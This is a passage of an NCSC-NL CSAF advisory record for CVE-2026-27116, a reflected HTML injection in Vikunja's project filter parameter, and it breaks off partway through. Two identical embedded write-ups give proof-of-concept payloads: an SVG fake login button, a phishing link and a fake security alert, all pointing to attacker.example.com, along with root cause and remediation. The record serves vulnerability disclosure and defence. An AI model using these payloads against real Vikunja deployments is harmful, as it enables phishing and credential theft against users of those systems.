{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-27116",
        "tracking": {
            "current_release_date": "2026-03-27T20:40:59.646158Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-27116",
            "initial_release_date": "2026-02-25T21:38:53.902295Z",
            "revision_history": [
                {
                    "date": "2026-02-25T21:38:53.902295Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-02-25T21:38:55.156109Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-02-25T22:25:21.680206Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-02-25T22:25:25.588668Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-25T22:39:03.768603Z",
                    "number": "5",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-02-25T22:39:49.408566Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-02-25T22:39:58.373634Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-26T00:12:46.395721Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-02-26T00:12:53.670684Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-26T11:39:57.376705Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (42).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-02-26T14:14:01.286011Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-02-26T14:14:05.579343Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-27T22:39:41.626392Z",
                    "number": "13",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-02-28T06:12:49.847549Z",
                    "number": "14",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-05T17:24:45.321442Z",
                    "number": "15",
                    "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-05T17:24:48.788393Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-09T06:12:45.874208Z",
                    "number": "17",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (3)."
                },
                {
                    "date": "2026-03-09T06:12:49.884734Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:42:33.149753Z",
                    "number": "19",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:42:35.977514Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T19:49:18.844048Z",
                    "number": "21",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (8).| CWES updated (1)."
                },
                {
                    "date": "2026-03-27T19:49:21.468679Z",
                    "number": "22",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "22"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=0.24.6",
                                "product": {
                                    "name": "vers:unknown/>=0|<=0.24.6",
                                    "product_id": "CSAFPID-5597060"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "api"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.21.0",
                                "product": {
                                    "name": "vers:unknown/0.21.0",
                                    "product_id": "CSAFPID-5602633"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.0.0",
                                "product": {
                                    "name": "vers:unknown/<2.0.0",
                                    "product_id": "CSAFPID-5712844"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.1",
                                "product": {
                                    "name": "vers:unknown/v0.1",
                                    "product_id": "CSAFPID-5602634"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.10",
                                "product": {
                                    "name": "vers:unknown/v0.10",
                                    "product_id": "CSAFPID-5602635"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.11",
                                "product": {
                                    "name": "vers:unknown/v0.11",
                                    "product_id": "CSAFPID-5602636"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.12",
                                "product": {
                                    "name": "vers:unknown/v0.12",
                                    "product_id": "CSAFPID-5602637"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.13",
                                "product": {
                                    "name": "vers:unknown/v0.13",
                                    "product_id": "CSAFPID-5602638"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.13.1",
                                "product": {
                                    "name": "vers:unknown/v0.13.1",
                                    "product_id": "CSAFPID-5602639"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.14.0",
                                "product": {
                                    "name": "vers:unknown/v0.14.0",
                                    "product_id": "CSAFPID-5602640"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.15.0",
                                "product": {
                                    "name": "vers:unknown/v0.15.0",
                                    "product_id": "CSAFPID-5602641"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.16.0",
                                "product": {
                                    "name": "vers:unknown/v0.16.0",
                                    "product_id": "CSAFPID-5602642"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.17.0",
                                "product": {
                                    "name": "vers:unknown/v0.17.0",
                                    "product_id": "CSAFPID-5602643"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.18.0",
                                "product": {
                                    "name": "vers:unknown/v0.18.0",
                                    "product_id": "CSAFPID-5602644"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.18.1",
                                "product": {
                                    "name": "vers:unknown/v0.18.1",
                                    "product_id": "CSAFPID-5602645"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.19.0",
                                "product": {
                                    "name": "vers:unknown/v0.19.0",
                                    "product_id": "CSAFPID-5602646"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.19.1",
                                "product": {
                                    "name": "vers:unknown/v0.19.1",
                                    "product_id": "CSAFPID-5602647"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.19.2",
                                "product": {
                                    "name": "vers:unknown/v0.19.2",
                                    "product_id": "CSAFPID-5602648"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.2",
                                "product": {
                                    "name": "vers:unknown/v0.2",
                                    "product_id": "CSAFPID-5602649"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.20.0",
                                "product": {
                                    "name": "vers:unknown/v0.20.0",
                                    "product_id": "CSAFPID-5602650"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.20.1",
                                "product": {
                                    "name": "vers:unknown/v0.20.1",
                                    "product_id": "CSAFPID-5602651"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.20.3",
                                "product": {
                                    "name": "vers:unknown/v0.20.3",
                                    "product_id": "CSAFPID-5602652"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.20.4",
                                "product": {
                                    "name": "vers:unknown/v0.20.4",
                                    "product_id": "CSAFPID-5602653"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.20.5",
                                "product": {
                                    "name": "vers:unknown/v0.20.5",
                                    "product_id": "CSAFPID-5602654"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.21.0",
                                "product": {
                                    "name": "vers:unknown/v0.21.0",
                                    "product_id": "CSAFPID-5602655"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.22.0",
                                "product": {
                                    "name": "vers:unknown/v0.22.0",
                                    "product_id": "CSAFPID-5602656"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.22.1",
                                "product": {
                                    "name": "vers:unknown/v0.22.1",
                                    "product_id": "CSAFPID-5602657"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.23.0",
                                "product": {
                                    "name": "vers:unknown/v0.23.0",
                                    "product_id": "CSAFPID-5602658"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.24.1",
                                "product": {
                                    "name": "vers:unknown/v0.24.1",
                                    "product_id": "CSAFPID-5602659"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.3",
                                "product": {
                                    "name": "vers:unknown/v0.3",
                                    "product_id": "CSAFPID-5602660"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.4",
                                "product": {
                                    "name": "vers:unknown/v0.4",
                                    "product_id": "CSAFPID-5602661"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.5",
                                "product": {
                                    "name": "vers:unknown/v0.5",
                                    "product_id": "CSAFPID-5602662"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.6",
                                "product": {
                                    "name": "vers:unknown/v0.6",
                                    "product_id": "CSAFPID-5602663"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.7",
                                "product": {
                                    "name": "vers:unknown/v0.7",
                                    "product_id": "CSAFPID-5602664"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.8",
                                "product": {
                                    "name": "vers:unknown/v0.8",
                                    "product_id": "CSAFPID-5602665"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.9",
                                "product": {
                                    "name": "vers:unknown/v0.9",
                                    "product_id": "CSAFPID-5602666"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0",
                                "product": {
                                    "name": "vers:unknown/v1.0.0",
                                    "product_id": "CSAFPID-5602667"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0-rc0",
                                "product": {
                                    "name": "vers:unknown/v1.0.0-rc0",
                                    "product_id": "CSAFPID-5602668"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v1.0.0-rc1",
                                    "product_id": "CSAFPID-5602669"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0-rc2",
                                "product": {
                                    "name": "vers:unknown/v1.0.0-rc2",
                                    "product_id": "CSAFPID-5602670"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0-rc3",
                                "product": {
                                    "name": "vers:unknown/v1.0.0-rc3",
                                    "product_id": "CSAFPID-5602671"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0-rc4",
                                "product": {
                                    "name": "vers:unknown/v1.0.0-rc4",
                                    "product_id": "CSAFPID-5602672"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.0",
                                "product": {
                                    "name": "vers:unknown/v1.1.0",
                                    "product_id": "CSAFPID-5727729"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/vue3",
                                "product": {
                                    "name": "vers:unknown/vue3",
                                    "product_id": "CSAFPID-5602673"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "vikunja"
                    }
                ],
                "category": "vendor",
                "name": "go-vikunja"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=0.24.6",
                                "product": {
                                    "name": "vers:unknown/<=0.24.6",
                                    "product_id": "CSAFPID-5847612"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "go/code.vikunja.io/api"
                    }
                ],
                "category": "vendor",
                "name": "code.vikunja.io"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.0.0",
                                "product": {
                                    "name": "vers:unknown/<2.0.0",
                                    "product_id": "CSAFPID-5763289",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "vikunja"
                    }
                ],
                "category": "vendor",
                "name": "vikunja"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-27116",
            "cwe": {
                "id": "CWE-79",
                "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.0.0, a reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. Version 2.0.0 fixes this issue.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27116"
                },
                {
                    "category": "description",
                    "text": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.0.0, a reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. Version 2.0.0 fixes this issue.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27116"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\n[Vikunja](https://github.com/go-vikunja/vikunja) is an open-source self-hosted task management platform with 3,300+ GitHub stars. A reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin.\n\n**Attack flow:** Attacker shares a crafted project filter link (routine Vikunja workflow) → victim opens it → victim clicks \"Filter\" (standard UI action) → phishing content renders inside trusted Vikunja interface.\n\n## Affected Component\n\n| Field | Detail |\n|---|---|\n| Application | Vikunja v1.1.0 |\n| Module | Projects |\n| Endpoint | `/projects/-1/-1?filter=PAYLOAD&page=1` |\n| Parameter | `filter` (GET) |\n| Trigger | Click \"Filter\" button |\n| Stack | Go backend, Vue.js + TypeScript frontend |\n| Blocked | `<script>`, `<iframe>` |\n| Allowed | `<svg>`, `<a>`, `<rect>`, `<text>`, `<h1>`, `<b>`, `<u>` |\n\n## Proof-of-Concept\n\n### PoC-1: SVG Phishing Button (Highest Impact)\n\nRenders a styled, clickable red button redirecting to attacker domain. Visually indistinguishable from a real UI button.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Csvg%20width%3D%22400%22%20height%3D%2260%22%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example.com%2Flogin%22%3E%3Crect%20width%3D%22400%22%20height%3D%2260%22%20rx%3D%224%22%20fill%3D%22%23d32f2f%22%3E%3C%2Frect%3E%3Ctext%20x%3D%22200%22%20y%3D%2237%22%20text-anchor%3D%22middle%22%20fill%3D%22white%22%20font-size%3D%2216%22%3ESession%20Expired%20-%20Click%20to%20Re-authenticate%3C%2Ftext%3E%3C%2Fa%3E%3C%2Fsvg%3E&page=1\n```\n\nRaw payload:\n```html\n<svg width=\"400\" height=\"60\"><a href=\"https://attacker.example.com/login\"><rect width=\"400\" height=\"60\" rx=\"4\" fill=\"#d32f2f\"></rect><text x=\"200\" y=\"37\" text-anchor=\"middle\" fill=\"white\" font-size=\"16\">Session Expired - Click to Re-authenticate</text></a></svg>\n```\n\n### PoC-2: Phishing Link via Heading + Anchor\n\nProminent clickable link styled as urgent system message.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Ch1%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example.com%2Flogin%22%3E%E2%9A%A0%20Your%20session%20has%20expired.%20Click%20here%20to%20sign%20in%20again.%3C%2Fa%3E%3C%2Fh1%3E&page=1\n```\n\nRaw payload:\n```html\n<h1><a href=\"https://attacker.example.com/login\">⚠ Your session has expired. Click here to sign in again.</a></h1>\n```\n\n### PoC-3: Content Spoofing — Fake Security Alert\n\nFake security warning directing victim to attacker-controlled contact.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Ch1%3E%3Cu%3E%3Cb%3E%E2%9A%A0%20SECURITY%20ALERT%3C%2Fb%3E%3C%2Fu%3E%3C%2Fh1%3E%3Cb%3EUnauthorized%20access%20detected%20on%20your%20account.%20Your%20account%20will%20be%20suspended%20in%2024%20hours.%20Contact%20IT%20security%20immediately%20at%20security%40attacker.example.com%20or%20visit%20https%3A%2F%2Fattacker.example.com%2Fverify%20to%20confirm%20your%20identity.%3C%2Fb%3E&page=1\n```\n\nRaw payload:\n```html\n<h1><u><b>⚠ SECURITY ALERT</b></u></h1><b>Unauthorized access detected on your account. Your account will be suspended in 24 hours. Contact IT security immediately at security@attacker.example.com or visit https://attacker.example.com/verify to confirm your identity.</b>\n```\n\n## Root Cause\n\nThe `filter` parameter is inserted into the DOM as raw HTML — likely via Vue.js `v-html` or `innerHTML`. A partial denylist strips `<script>` and `<iframe>` but does not encode output or filter SVG/anchor/formatting elements. No allowlist, no output encoding, no input syntax validation exists.\n\n## Impact\n\n| Impact | Description |\n|---|---|\n| SVG Phishing Buttons | Pixel-perfect fake buttons redirect to credential harvesting pages |\n| External Redirect | Anchor tags point to attacker domains from within trusted origin |\n| Content Spoofing | Fake alerts manipulate users into contacting attacker channels |\n| Self-Hosted Risk | Compromised credentials may grant access to internal infrastructure |\n| API Access | Same credentials grant full REST API access for data exfiltration |\n| No Logging | GET-based reflected injection leaves no distinguishable server logs |\n\n**Not Self-XSS:** Payload is attacker-controlled via URL, delivered through routine link sharing, triggered by standard UI interaction. Victim performs no security-relevant decision.\n\n## CWE & CVSS\n\n**CWE-79** (Primary) — Improper Neutralization of Input During Web Page Generation\n\n**CWE-80** (Secondary) — Improper Neutralization of Script-Related HTML Tags\n\n**CVSS 3.1:** `AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` — **6.1 (Medium)**\n\nScore understates risk because: user interactions are routine workflow (not security decisions), SVG enables pixel-perfect UI spoofing, self-hosted deployments expose internal infrastructure, and API credential equivalence enables automated data exfiltration.\n\n## Remediation\n\n| Priority | Action |\n|---|---|\n| P0 | Replace `v-html` with `v-text` or `{{ }}` interpolation (auto-escapes HTML) |\n| P0 | HTML entity encode the `filter` value at rendering point |\n| P1 | Replace denylist with DOMPurify strict allowlist or eliminate HTML rendering of filter values |\n| P1 | Deploy CSP with `form-action 'self'` |\n| P2 | Server-side input validation — reject filter values not matching expected syntax |\n\n## References\n\n- Vikunja Repository: https://github.com/go-vikunja/vikunja\n- CWE-79: https://cwe.mitre.org/data/definitions/79.html\n- CWE-80: https://cwe.mitre.org/data/definitions/80.html\n- OWASP XSS Prevention: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Scripting_Prevention_Cheat_Sheet.html\n\n## Conclusion\n\nThe `filter` parameter in Vikunja's Projects module renders unsanitized HTML into the DOM, enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. The attack requires only routine workflow actions — opening a shared link and clicking \"Filter.\" The fix is a single-line change: replacing `v-html` with `v-text` in the Vue.js rendering logic. Given Vikunja's adoption (3,300+ stars), self-hosted deployment model, and API credential equivalence, this warrants prompt remediation.\n\n<img width=\"1920\" height=\"1020\" alt=\"image\" src=\"https://github.com/user-attachments/assets/007f9b1a-fd20-4fe8-84e5-1bf886a5a7a9\" />\n\nA fix is available at https://github.com/go-vikunja/vikunja/releases/tag/v2.0.0.",
                    "title": "github - https://github.com/advisories/GHSA-4qgr-4h56-8895"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\n[Vikunja](https://github.com/go-vikunja/vikunja) is an open-source self-hosted task management platform with 3,300+ GitHub stars. A reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin.\n\n**Attack flow:** Attacker shares a crafted project filter link (routine Vikunja workflow) → victim opens it → victim clicks \"Filter\" (standard UI action) → phishing content renders inside trusted Vikunja interface.\n\n## Affected Component\n\n| Field | Detail |\n|---|---|\n| Application | Vikunja v1.1.0 |\n| Module | Projects |\n| Endpoint | `/projects/-1/-1?filter=PAYLOAD&page=1` |\n| Parameter | `filter` (GET) |\n| Trigger | Click \"Filter\" button |\n| Stack | Go backend, Vue.js + TypeScript frontend |\n| Blocked | `<script>`, `<iframe>` |\n| Allowed | `<svg>`, `<a>`, `<rect>`, `<text>`, `<h1>`, `<b>`, `<u>` |\n\n## Proof-of-Concept\n\n### PoC-1: SVG Phishing Button (Highest Impact)\n\nRenders a styled, clickable red button redirecting to attacker domain. Visually indistinguishable from a real UI button.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Csvg%20width%3D%22400%22%20height%3D%2260%22%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example.com%2Flogin%22%3E%3Crect%20width%3D%22400%22%20height%3D%2260%22%20rx%3D%224%22%20fill%3D%22%23d32f2f%22%3E%3C%2Frect%3E%3Ctext%20x%3D%22200%22%20y%3D%2237%22%20text-anchor%3D%22middle%22%20fill%3D%22white%22%20font-size%3D%2216%22%3ESession%20Expired%20-%20Click%20to%20Re-authenticate%3C%2Ftext%3E%3C%2Fa%3E%3C%2Fsvg%3E&page=1\n```\n\nRaw payload:\n```html\n<svg width=\"400\" height=\"60\"><a href=\"https://attacker.example.com/login\"><rect width=\"400\" height=\"60\" rx=\"4\" fill=\"#d32f2f\"></rect><text x=\"200\" y=\"37\" text-anchor=\"middle\" fill=\"white\" font-size=\"16\">Session Expired - Click to Re-authenticate</text></a></svg>\n```\n\n### PoC-2: Phishing Link via Heading + Anchor\n\nProminent clickable link styled as urgent system message.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Ch1%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example.com%2Flogin%22%3E%E2%9A%A0%20Your%20session%20has%20expired.%20Click%20here%20to%20sign%20in%20again.%3C%2Fa%3E%3C%2Fh1%3E&page=1\n```\n\nRaw payload:\n```html\n<h1><a href=\"https://attacker.example.com/login\">⚠ Your session has expired. Click here to sign in again.</a></h1>\n```\n\n### PoC-3: Content Spoofing — Fake Security Alert\n\nFake security warning directing victim to attacker-controlled contact.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Ch1%3E%3Cu%3E%3Cb%3E%E2%9A%A0%20SECURITY%20ALERT%3C%2Fb%3E%3C%2Fu%3E%3C%2Fh1%3E%3Cb%3EUnauthorized%20access%20detected%20on%20your%20account.%20Your%20account%20will%20be%20suspended%20in%2024%20hours.%20Contact%20IT%20security%20immediately%20at%20security%40attacker.example.com%20or%20visit%20https%3A%2F%2Fattacker.example.com%2Fverify%20to%20confirm%20your%20identity.%3C%2Fb%3E&page=1\n```\n\nRaw payload:\n```html\n<h1><u><b>⚠ SECURITY ALERT</b></u></h1><b>Unauthorized access detected on your account. Your account will be suspended in 24 hours. Contact IT security immediately at security@attacker.example.com or visit https://attacker.example.com/verify to confirm your identity.</b>\n```\n\n## Root Cause\n\nThe `filter` parameter is inserted into the DOM as raw HTML — likely via Vue.js `v-html` or `innerHTML`. A partial denylist strips `<script>` and `<iframe>` but does not encode output or filter SVG/anchor/formatting elements. No allowlist, no output encoding, no input syntax validation exists.\n\n## Impact\n\n| Impact | Description |\n|---|---|\n| SVG Phishing Buttons | Pixel-perfect fake buttons redirect to credential harvesting pages |\n| External Redirect | Anchor tags point to attacker domains from within trusted origin |\n| Content Spoofing | Fake alerts manipulate users into contacting attacker channels |\n| Self-Hosted Risk | Compromised credentials may grant access to internal infrastructure |\n| API Access | Same credentials grant full REST API access for data exfiltration |\n| No Logging | GET-based reflected injection leaves no distinguishable server logs |\n\n**Not Self-XSS:** Payload is attacker-controlled via URL, delivered through routine link sharing, triggered by standard UI interaction. Victim performs no security-relevant decision.\n\n## CWE & CVSS\n\n**CWE-79** (Primary) — Improper Neutralization of Input During Web Page Generation\n\n**CWE-80** (Secondary) — Improper Neutralization of Script-Related HTML Tags\n\n**CVSS 3.1:** `AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` — **6.1 (Medium)**\n\nScore understates risk because: user interactions are routine workflow (not security decisions), SVG enables pixel-perfect UI spoofing, self-hosted deployments expose internal infrastructure, and API credential equivalence enables automated data exfiltration.\n\n## Remediation\n\n| Priority | Action |\n|---|---|\n| P0 | Replace `v-html` with `v-text` or `{{ }}` interpolation (auto-escapes HTML) |\n| P0 | HTML entity encode the `filter` value at rendering point |\n| P1 | Replace denylist with DOMPurify strict allowlist or eliminate HTML rendering of filter values |\n| P1 | Deploy CSP with `form-action 'self'` |\n| P2 | Server-side input validation — reject filter values not matching expected syntax |\n\n## References\n\n- Vikunja Repository: https://github.com/go-vikunja/vikunja\n- CWE-79: https://cwe.mitre.org/data/definitions/79.html\n- CWE-80: https://cwe.mitre.org/data/definitions/80.html\n- OWASP XSS Prevention: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Scripting_Prevention_Cheat_Sheet.html\n\n## Conclusion\n\nThe `filter` parameter in Vikunja's Projects module renders unsanitized HTML into the DOM, enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. The attack requires only routine workflow actions — opening a shared link and clicking \"Filter.\" The fix is a single-line change: replacing `v-html` with `v-text` in the Vue.js rendering logic. Given Vikunja's adoption (3,300+ stars), self-hosted deployment model, and API credential equivalence, this warrants prompt remediation.\n\n<img width=\"1920\" height=\"1020\" alt=\"image\" src=\"https://github.com/user-attachments/assets/007f9b1a-fd20-4fe8-84e5-1bf886a5a7a9\" />\n\nA fix is available at https://github.com/go-vikunja/vikunja/releases/tag/v2.0.0.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-4qgr-4h56-8895.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.0.0, a reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. Version 2.0.0 fixes this issue.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-27116.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Vikunja has Reflected HTML Injection via filter Parameter in its Projects Module in code.vikunja.io/api",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4552.json?alt=media"
                },
                {
                    "category": "description",
